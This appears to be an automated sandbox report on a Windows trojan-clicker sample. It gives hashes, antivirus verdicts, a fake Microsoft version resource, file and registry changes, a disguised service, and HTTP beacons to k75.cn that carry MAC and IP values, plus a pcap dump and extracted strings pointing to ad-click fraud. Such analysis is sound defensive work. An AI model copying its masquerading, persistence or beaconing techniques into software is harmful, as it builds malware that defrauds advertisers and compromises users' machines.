Analysis Date | 2014-10-10 19:01:42 |
---|---|
MD5 | bc75e5c03e200ddf6fc657de71a9b744 |
SHA1 | ef68844bafc720db44631adceb884536e1d42a6d |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 8ba5adc7a003ad956f866b2a6ae8fa4d sha1: 9db343e7aef2805776f52fd4130bbffccca4e1dd size: 33001 | |
Section | .data md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0 | |
Section | .rsrc md5: fb18b0a66157d9bd4f185e594e10b3ed sha1: eaad39fca71766a4543cf7d9f29a1896df49526c size: 153993 | |
Timestamp | 2009-09-28 13:54:18 | |
Version | InternalName: wmiprsve FileVersion: 1.00 CompanyName: Microsoft Corporation ProductName: Microsoft(R) Windows(R) Operating System ProductVersion: 1.00 OriginalFilename: wmiprsve.exe | |
Packer | AHTeam EP Protector 0.3 (fake PCGuard 4.03-4.15) -> FEUERRADER | |
PEhash | f79e77d90c068923e550d1ee1c36a6173e7903c4 | |
IMPhash | 07bc5ebd01e0903e4b2020f5c61217f0 | |
AV | 360 Safe | Gen:Trojan.Heur.GZ.lm0@bWyQNkdl |
AV | Ad-Aware | Gen:Trojan.Heur.GZ.lm0@bWyQNkdl |
AV | Alwil (avast) | Malware-gen:Win32:Malware-gen |
AV | Arcabit (arcavir) | no_virus |
AV | Authentium | W32/Risk.CYPY-5897 |
AV | Avira (antivir) | TR/Spy.Gen |
AV | BullGuard | Gen:Trojan.Heur.GZ.lm0@bWyQNkdl |
AV | CA (E-Trust Ino) | no_virus |
AV | CAT (quickheal) | no_virus |
AV | ClamAV | no_virus |
AV | Dr. Web | Trojan.Click.37051 |
AV | Emsisoft | Gen:Trojan.Heur.GZ.lm0@bWyQNkdl |
AV | Eset (nod32) | Win32/VB.ORT |
AV | Fortinet | Malware_fam.A |
AV | Frisk (f-prot) | W32/MalwareS.BAPO |
AV | F-Secure | Gen:Trojan.Heur.GZ.lm0@bWyQNkdl |
AV | Grisoft (avg) | Dropper.Generic3.BIRV |
AV | Ikarus | Trojan-Clicker.Win32.VB |
AV | K7 | Trojan ( 0001140e1 ) |
AV | Kaspersky | Trojan.Win32.Generic:Trojan-Clicker.Win32.VB.ddu |
AV | MalwareBytes | no_virus |
AV | Mcafee | RDN/Generic Dropper!vi |
AV | Microsoft Security Essentials | Trojan:Win32/Provis!rts |
AV | MicroWorld (escan) | Gen:Trojan.Heur.GZ.lm0@bWyQNkdl |
AV | Norman | win32:win32/SB/Obfuscated_FA |
AV | Rising | no_virus |
AV | Sophos | Mal/Behav-210 |
AV | Symantec | Trojan Horse |
AV | Trend Micro | no_virus |
AV | VirusBlokAda (vba32) | TrojanClicker.VB |
AV | Yara APT | no_virus |
AV | Zillya! | Dropper.VB.Win32.20245 |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
---|---|
Creates File | PIPE\wkssvc |
Creates File | C:\WINDOWS\system32\malware.exe |
Creates File | C:\WINDOWS\system32\syswindows.ini |
Creates Process | "C:\WINDOWS\system32\malware.exe" |
Process
↳ "C:\WINDOWS\system32\malware.exe"
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
---|---|
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Creates File | PIPE\wkssvc |
Creates File | C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates File | \Device\Netbios |
Creates File | C:\WINDOWS\system32\spoolsrv.exe |
Deletes File | C:\\malware.exe |
Deletes File | C:\WINDOWS\system32\syswindows.ini |
Creates Process | "C:\WINDOWS\system32\spoolsrv.exe" |
Creates Mutex | c:!documents and settings!administrator!local settings!history!history.ie5! |
Creates Mutex | WininetConnectionMutex |
Creates Mutex | c:!documents and settings!administrator!cookies! |
Creates Mutex | c:!documents and settings!administrator!local settings!temporary internet files!content.ie5! |
Creates Service | Windows Workstation System - C:\WINDOWS\system32\wmiprsve.exe |
Winsock DNS | www.k75.cn |
Process
↳ Pid 800
Process
↳ Pid 848
Process
↳ C:\WINDOWS\System32\svchost.exe
Creates File | C:\WINDOWS\system32\WBEM\Logs\wbemess.log |
---|
Process
↳ Pid 1108
Process
↳ Pid 1204
Process
↳ C:\WINDOWS\system32\spoolsv.exe
Registry | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL |
---|---|
Registry | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7 |
Registry | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL |
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00 |
Process
↳ Pid 1840
Process
↳ Pid 1140
Process
↳ "C:\WINDOWS\system32\spoolsrv.exe"
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\~DFFC48.tmp |
---|---|
Creates File | C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Creates File | PIPE\lsarpc |
Creates File | \Device\Netbios |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ip138[1].htm |
Network Details:
DNS | cname.huatian.net Type: A 74.207.247.129 |
---|---|
DNS | yd.ecoma.glb0.lxdns.com Type: A 14.17.101.19 |
DNS | yd.ecoma.glb0.lxdns.com Type: A 14.17.101.20 |
DNS | yd.ecoma.glb0.lxdns.com Type: A 14.17.101.21 |
DNS | yd.ecoma.glb0.lxdns.com Type: A 14.17.101.18 |
DNS | www.ip138.cn Type: A 218.133.22.66 |
DNS | www.k75.cn Type: A |
DNS | www.ip138.com Type: A |
HTTP GET | http://www.k75.cn/Count.aspx?mac=00-00-00-00-00-00 User-Agent: MyAgent |
HTTP GET | http://www.ip138.com/ips.asp User-Agent: MyAgent |
HTTP GET | http://www.ip138.cn/ User-Agent: MyAgent |
HTTP GET | http://www.k75.cn/Version.txt User-Agent: MyAgent |
HTTP GET | http://www.k75.cn/GetDate.aspx?ip=127.0.0.1&mac=00-00-00-00-00-00&ver=1.0.0 User-Agent: MyAgent |
Flows TCP | 192.168.1.1:1032 ➝ 74.207.247.129:80 |
Flows TCP | 192.168.1.1:1033 ➝ 14.17.101.19:80 |
Flows TCP | 192.168.1.1:1034 ➝ 218.133.22.66:80 |
Flows TCP | 192.168.1.1:1035 ➝ 74.207.247.129:80 |
Flows TCP | 192.168.1.1:1036 ➝ 74.207.247.129:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f436f75 6e742e61 7370783f GET /Count.aspx? 0x00000010 (00016) 6d61633d 30302d30 302d3030 2d30302d mac=00-00-00-00- 0x00000020 (00032) 30302d30 30204854 54502f31 2e310d0a 00-00 HTTP/1.1.. 0x00000030 (00048) 55736572 2d416765 6e743a20 4d794167 User-Agent: MyAg 0x00000040 (00064) 656e740d 0a486f73 743a2077 77772e6b ent..Host: www.k 0x00000050 (00080) 37352e63 6e0d0a43 6f6e7465 6e742d4c 75.cn..Content-L 0x00000060 (00096) 656e6774 683a2032 310d0a43 61636865 ength: 21..Cache 0x00000070 (00112) 2d436f6e 74726f6c 3a206e6f 2d636163 -Control: no-cac 0x00000080 (00128) 68650d0a 0d0a6d61 633d3030 2d30302d he....mac=00-00- 0x00000090 (00144) 30302d30 302d3030 2d3030 00-00-00-00 0x00000000 (00000) 47455420 2f697073 2e617370 20485454 GET /ips.asp HTT 0x00000010 (00016) 502f312e 310d0a55 7365722d 4167656e P/1.1..User-Agen 0x00000020 (00032) 743a204d 79416765 6e740d0a 486f7374 t: MyAgent..Host 0x00000030 (00048) 3a207777 772e6970 3133382e 636f6d0d : www.ip138.com. 0x00000040 (00064) 0a436163 68652d43 6f6e7472 6f6c3a20 .Cache-Control: 0x00000050 (00080) 6e6f2d63 61636865 0d0a0d0a 6e742d4c no-cache....nt-L 0x00000060 (00096) 656e6774 683a2032 310d0a43 61636865 ength: 21..Cache 0x00000070 (00112) 2d436f6e 74726f6c 3a206e6f 2d636163 -Control: no-cac 0x00000080 (00128) 68650d0a 0d0a6d61 633d3030 2d30302d he....mac=00-00- 0x00000090 (00144) 30302d30 302d3030 2d3030 00-00-00-00 0x00000000 (00000) 47455420 2f204854 54502f31 2e310d0a GET / HTTP/1.1.. 0x00000010 (00016) 55736572 2d416765 6e743a20 4d794167 User-Agent: MyAg 0x00000020 (00032) 656e740d 0a486f73 743a2077 77772e69 ent..Host: www.i 0x00000030 (00048) 70313338 2e636e0d 0a436163 68652d43 p138.cn..Cache-C 0x00000040 (00064) 6f6e7472 6f6c3a20 6e6f2d63 61636865 ontrol: no-cache 0x00000050 (00080) 0d0a0d0a 61636865 0d0a0d0a 6e742d4c ....ache....nt-L 0x00000060 (00096) 656e6774 683a2032 310d0a43 61636865 ength: 21..Cache 0x00000070 (00112) 2d436f6e 74726f6c 3a206e6f 2d636163 -Control: no-cac 0x00000080 (00128) 68650d0a 0d0a6d61 633d3030 2d30302d he....mac=00-00- 0x00000090 (00144) 30302d30 302d3030 2d3030 00-00-00-00 0x00000000 (00000) 47455420 2f566572 73696f6e 2e747874 GET /Version.txt 0x00000010 (00016) 20485454 502f312e 310d0a55 7365722d HTTP/1.1..User- 0x00000020 (00032) 4167656e 743a204d 79416765 6e740d0a Agent: MyAgent.. 0x00000030 (00048) 486f7374 3a207777 772e6b37 352e636e Host: www.k75.cn 0x00000040 (00064) 0d0a4361 6368652d 436f6e74 726f6c3a ..Cache-Control: 0x00000050 (00080) 206e6f2d 63616368 650d0a0d 0a742d4c no-cache....t-L 0x00000060 (00096) 656e6774 683a2032 310d0a43 61636865 ength: 21..Cache 0x00000070 (00112) 2d436f6e 74726f6c 3a206e6f 2d636163 -Control: no-cac 0x00000080 (00128) 68650d0a 0d0a6d61 633d3030 2d30302d he....mac=00-00- 0x00000090 (00144) 30302d30 302d3030 2d3030 00-00-00-00 0x00000000 (00000) 47455420 2f476574 44617465 2e617370 GET /GetDate.asp 0x00000010 (00016) 783f6970 3d313237 2e302e30 2e31266d x?ip=127.0.0.1&m 0x00000020 (00032) 61633d30 302d3030 2d30302d 30302d30 ac=00-00-00-00-0 0x00000030 (00048) 302d3030 26766572 3d312e30 2e302048 0-00&ver=1.0.0 H 0x00000040 (00064) 5454502f 312e310d 0a557365 722d4167 TTP/1.1..User-Ag 0x00000050 (00080) 656e743a 204d7941 67656e74 0d0a486f ent: MyAgent..Ho 0x00000060 (00096) 73743a20 7777772e 6b37352e 636e0d0a st: www.k75.cn.. 0x00000070 (00112) 436f6e74 656e742d 4c656e67 74683a20 Content-Length: 0x00000080 (00128) 34340d0a 43616368 652d436f 6e74726f 44..Cache-Contro 0x00000090 (00144) 6c3a206e 6f2d6361 6368650d 0a0d0a69 l: no-cache....i 0x000000a0 (00160) 703d3132 372e302e 302e3126 6d61633d p=127.0.0.1&mac= 0x000000b0 (00176) 30302d30 302d3030 2d30302d 30302d30 00-00-00-00-00-0 0x000000c0 (00192) 30267665 723d312e 302e30 0&ver=1.0.0
Strings
[$$] \*.* 00-00-00-00-00-00 080404B0 1.00 127.0.0.1 127.0.0.1| 51.la @\90\DTS\Binn\;D: 90\Too 99.99.99 about:blank /aclk?sa= alimamaclick alinkalink baiduclick baidusearch _blank body <br> <br><br> <br/><br/></td> classname Click &clickid= CloseTab_Error cnzz.com CompanyName continue Count.aspx? /count.html CUSTOM divgoogleclick divgooglesearch <div id="divalinkalink"><a id="alinkalink" href= Document DocumentComplete_Error dows\Curren ;D:\Prog EnLiveDownConfig.txt .exe execScript Explorer.ini False FileName FileVersion Form_Load_Error GetDate.aspx? GetDateUpdate.aspx? GetUrlKeyWord_Error google googleads.g.doubleclick.net/pagead/ads? googleads.g.doubleclick.net/pagead/sdo? googlebaiduservices googleclick googlesearch G:\VBServiceIEBr href http:// HTTP/1.1 iexplore.exe InnerHtml innerText INPUT InternalName &ip= ips.asp @isual Studio\VB98\C2.EXE.M javascript &jjclick= @jjj LegalTrademarks Length live800.com liveupdate.8866.org LocalSystem &mac= mac= MainStar_Error Microsoft Corporation Microsoft(R) Microsoft(R) Windows(R) Operating System MyAgent name Name > </a></div> NewTab NewWindow2 offsetLeft offsetParent offsetTop OldPathFile Open OriginalFilename otherclick outerHTML parentWindow ProductName ProductVersion &ptclick= &ptclicknub= qq.com quit .rar rosoft\Win /search? SelectBrowserTab SelectBrowserTabRefresh_Error ServiceName &siteid= @s\Micros Software\Mic spoolsrv spoolsrv.exe StarLoad_Error StringFileInfo submit System Workstation System Event Service syswindows.ini tagName tags Target tencent: Translation true True tVersion\R &type= Type username= Value VarFileInfo &ver= Version.txt VS_VERSION_INFO @vXPEN\DeleteCookies.OBJ" -QIfd window.alert=null; WindowsUpdate.exe WindowsUpdate.rar Windows Workstation Windows Workstation System wmiprsve wmiprsve.exe www.google www.ip138.cn www.ip138.com www.k75.cn .zip 0-0000- 0W@W/f -2_cb`bbb^(- ^/3IKNKH7"!W 4>-L2^3 6,L->;- 6&vb6chs.dll _adj_fdiv_m16i _adj_fdiv_m32 _adj_fdiv_m32i _adj_fdiv_m64 _adj_fdiv_r _adj_fdivr_m16i _adj_fdivr_m32 _adj_fdivr_m32i _adj_fdivr_m64 _adj_fpatan _adj_fprem _adj_fprem1 _adj_fptan advapi32 advapi32.dll ADVAPI32.DLL _allmul brwWebBrowser ChangeServiceConfig2W _CIatan _CIcos _CIexp _CIlog _CIsin _CIsqrt _CItan ClientToScreen CloseHandle CloseServiceHandle CloseTab ControlService CreateEventW CreateServiceW CreateThread CreateToolhelp32Snapshot `.data DeleteAllTabs DeleteCookies DeleteFileA DeleteService DeleteTabsNub DeleteTabsNubArr DeleteTempInteFile DeleteUrlCacheEntryA DelIniKey DelIniSec DllFunctionCall D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB dRsjWSs dRs&rRs Ds6nTs ,DUUD, D:\WINDOWS\system32\ieframe.oca D:\WINDOWS\system32\msvbvm60.dll\3 EVENT_SINK_AddRef EVENT_SINK_QueryInterface EVENT_SINK_Release FindCloseUrlCache FindFirstUrlCacheEntryA FindNextUrlCacheEntryA FindProcess FindWindowA frmBrowser \G{000iexpIore *g~b0R G^cbZ8 GetCursorPos GetIniKey GetPrivateProfileStringA GetProcessHeap GetSystemDirectoryA GetTickCount GetUrlKeyWord GetVersionExA GetWindowLongA googlebaiduservices HeapAlloc HeapFree HttpOpenRequestA HttpSendRequestA ieframe.dll iexpIore IniFile INIFileName InternetCloseHandle InternetConnectA InternetOpenA InternetReadFile intNub jdh4>@ j|h(,@ j@h`>@ j\h4>@ jhh(,@ jPh(,@ jXh(,@ jXh|5@ kernel32 KERNEL32.DLL keybd_event KeyWord kTs^bRs l~b0RD LocalAlloc LocalFree lstrcpyA lstrcpyW lstrlenA lstrlenW MainStar MapVirtualKeyA MessageBoxA mouse_event MoveFileExA MsgWaitForMultipleObjects MSVBVM60.DLL N,`beggfedZ[#N netapi32.dll Netbios New_IniPath NewTab NTService NTServiceControl nubarr nygJcoj OpenProcess OpenSCManagerW OpenServiceW `OS_MR O\U^PW Process32First Process32Next PsD~Ss Qs|5Ds Qs|5DsO QsA^Rs QsA^RsZ Qs^bRs Qsb>Rsi QsdjRsk Qs{eRs Qs.kTsL QsqbRs QsqbRs@ QsqOQs Qs:_Rs QsU#Qs QueryServiceConfigW QueryServiceStatus ReadyState RegCloseKey RegisterServiceCtrlHandlerW RegisterWindowMessageA RegOpenKeyA RegQueryValueExA RegSetValueExA ?Rsb>Rsi Rs{eRs Rs.kTs Rsq:Ts Rs__Rs <Rs[rSs= RsSuTsQhRs RtlMoveMemory ScreenToClient SectionName SelectBrowserTab SelectBrowserTabRefresh SetCursorPos SetEvent SetForegroundWindow SetLayeredWindowAttributes SetServiceStatus SetWindowLongA SetWindowPos SHDocVwCtl SHDocVwCtl.WebBrowser shell32.dll ShellExecuteA shfolder.dll SHGetFolderPathA ShowErrorMessageBox ShowWindow spoolsrv SsbcRs StarLoad StarMain StartServiceCtrlDispatcherW StartServiceW strKey strSection strValue TerminateProcess !This program cannot be run in DOS mode. timeGetTime Timer1 Timer2 Timer3 Ts0LRs Ts__Rs URLDownloadToFileA urlmon user32 VBA6.DLL __vbaAryConstruct2 __vbaAryCopy __vbaAryDestruct __vbaAryLock __vbaAryMove __vbaAryUnlock __vbaAryVar __vbaBoolVar __vbaBoolVarNull __vbaCastObj __vbaChkstk __vbaCopyBytes __vbaDateVar __vbaEnd __vbaErrorOverflow __vbaExceptHandler __vbaExitProc __vbaFileClose __vbaFileOpen __vbaFPException __vbaFpI4 __vbaFPInt __vbaFpR8 __vbaFreeObj __vbaFreeObjList __vbaFreeStr __vbaFreeStrList __vbaFreeVar __vbaFreeVarList __vbaGenerateBoundsError __vbaHresultCheckObj __vbaI2I4 __vbaI2Var __vbaI4Var __vbaInStr __vbaInStrVar __vbaLateIdCall __vbaLateIdCallLd __vbaLateIdSt __vbaLateMemCall __vbaLateMemCallLd __vbaLateMemSt __vbaLenBstr __vbaLsetFixstr __vbaNew2 __vbaObjIs __vbaObjSet __vbaObjSetAddref __vbaObjVar __vbaOnError __vbaPutOwner3 __vbaR4Var __vbaRecAnsiToUni __vbaRecDestruct __vbaRecDestructAnsi __vbaRecUniToAnsi __vbaRedim __vbaRedimPreserve __vbaRefVarAry __vbaSetSystemError __vbaStrCat __vbaStrCmp __vbaStrCopy __vbaStrFixstr __vbaStrI2 __vbaStrI4 __vbaStrMove __vbaStrToAnsi __vbaStrToUnicode __vbaStrVarCopy __vbaStrVarMove __vbaStrVarVal __vbaUbound __vbaUI1I2 __vbaUI1I4 __vbaVar2Vec __vbaVarAdd __vbaVarAnd __vbaVarCat __vbaVarCmpEq __vbaVarCmpGt __vbaVarCmpLt __vbaVarCmpNe __vbaVarCopy __vbaVarDup __vbaVarForInit __vbaVarForNext __vbaVarIndexLoad __vbaVarLateMemCallLd __vbaVarLateMemCallLdRf __vbaVarLateMemSt __vbaVarMove __vbaVarNot __vbaVarOr __vbaVarSetVar __vbaVarSub __vbaVarTstEq __vbaVarTstGe __vbaVarTstGt __vbaVarTstLe __vbaVarTstLt __vbaVarTstNe __vbaVarVargNofree WaitForSingleObject WebBrowser wininet wininet.dll winIogon winmm.dll wmiprsve WriteIniKey WritePrivateProfileStringA YFh*jPW